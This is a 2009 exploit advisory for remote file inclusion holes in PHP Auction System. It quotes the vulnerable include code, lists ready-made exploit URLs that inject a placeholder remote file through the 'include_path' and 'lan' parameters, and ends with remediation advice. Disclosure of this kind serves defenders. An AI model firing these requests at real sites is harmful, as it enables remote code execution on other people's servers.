[»]=======================================================================================================[_][-][X]
[»] [»]
[»] PHPAuctionSystem Multiple Remote File Inclusion Vulnerability [»]
[»] [»]
[»] ======= ------d-------m------ ==== ==== [»]
[»] || = | |(o o)| | || || || [»]
[»] || = ||(~)|| || || [»]
[»] ======= /|\ || || [»]
[»]=============================================================================================================[»]
[»] Author : ~darkmasking~ [»]
[»] Date : January, 6th 2009 [»]
[»] Web : https://www.idsafeshield.com [»]
[»] Contact : support[at]idsafeshield[dot]com [»]
[»] Critical Level : Dangerous [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] Affected software description : [»]
[»] Software : PHP Auction System [»]
[»] Vendor : http://www.phpauctions.info/ [»]
[»] Price : $59.99 [»]
[»]=============================================================================================================[»]
[»] [»]
[»] [~] Vulnerable files [»]
[»] [»]
[»] [+] All files below are affected through the "include_path" parameter [»]
[»] [»]
[»] ./includes/settings.inc.php [»]
[»] $password_file = $include_path."passwd.inc.php"; [»]
[»] include($password_file); [»]
[»] include $include_path."fonts.inc.php"; [»]
[»] include $include_path."fontsize.inc.php"; [»]
[»] include($include_path."currency.inc.php"); [»]
[»] include($include_path."errors.inc.php"); [»]
[»] include($include_path."https.inc.php"); [»]
[»] [»]
[»] ./includes/auction_confirmation.inc.php [»]
[»] require("./includes/messages.inc.php"); [»]
[»] [»]
[»] ./includes/converter.inc.php [»]
[»] include($include_path."nusoap.php"); [»]
[»] [»]
[»] ./includes/messages.inc.php [»]
[»] require($include_path.'messages.'.$language.'.inc.php'); [»]
[»] [»]
[»] ./includes/stats.inc.php [»]
[»] include $prefix."includes/useragent.inc.php"; [»]
[»] include $prefix."includes/domains.inc.php"; [»]
[»] [»]
[»] ./includes/useragent.inc.php [»]
[»] include $prefix."includes/browsers.inc.php"; [»]
[»] include $prefix."includes/platforms.inc.php"; [»]
[»] [»]
[»] ./includes/user_confirmation.inc.php [»]
[»] require("./includes/messages.inc.php"); [»]
[»] [»]
[»] [»]
[»] [+] All files below are affected through the "lan" parameter [»]
[»] [»]
[»] ./browse.php [»]
[»] ./search.php [»]
[»] if(!empty($_GET['lan'])) { [»]
[»] $language = $lan; [»]
[»] $_SESSION['language'] = $language; [»]
[»] [»]
[»] #// Set language cookie [»]
[»] setcookie("USERLANGUAGE",$lan,time()+31536000,"/"); [»]
[»] } elseif(empty($_SESSION['language']) && !isset($_COOKIE['USERLANGUAGE'])) { [»]
[»] $language = $SETTINGS['defaultlanguage']; [»]
[»] $_SESSION['language'] = $language; [»]
[»] [»]
[»] #// Set language cookie [»]
[»] setcookie("USERLANGUAGE",$language,time()+31536000); [»]
[»] } elseif(isset($_COOKIE['USERLANGUAGE'])) { [»]
[»] $language = $_COOKIE['USERLANGUAGE']; [»]
[»] } [»]
[»] [»]
[»] require($include_path.'messages.'.$language.'.inc.php'); [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Exploit [»]
[»] [»]
[»] [+] "include_path" parameter [»]
[»] [»]
[»] http://www.darkvictims.com/[path]/includes/settings.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/auction_confirmation.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/converter.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/messages.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/stats.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/useragent.inc.php?include_path=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/includes/user_confirmation.inc.php?include_path=[darkcode] [»]
[»] [»]
[»] [»]
[»] [+] "lan" parameter [»]
[»] [»]
[»] http://www.darkvictims.com/[path]/browse.php?lan=[darkcode] [»]
[»] http://www.darkvictims.com/[path]/search.php?lan=[darkcode] [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] How to fix this vulnerability [»]
[»] [»]
[»] Edit the source code to ensure that input is properly validated. Where possible, [»]
[»] it is recommended to make a list of accepted filenames and restrict the input to that list. [»]
[»] [»]
[»] For PHP, the option allow_url_fopen normally allows a programmer to open, [»]
[»] include or otherwise use a remote file using a URL rather than a local file path. [»]
[»] It is recommended to disable this option in php.ini (and allow_url_include, which governs include/require of URLs). [»]
[»] Note that this only blocks the remote case: the same unvalidated parameters can still include local files, [»]
[»] so the whitelist of accepted filenames above is the primary fix. [»]
[»] [»]
[»]-------------------------------------------------------------------------------------------------------------[»]
[»] [»]
[»] [~] Greetz [»]
[»] [»]
[»] BUAT DIRI SENDIRI AJA [ Sorry Bro belum dapat teman :) ] [»]
[»] [»]
[»] [»]
[»]=============================================================================================================[»]
# milw0rm.com [2009-01-06]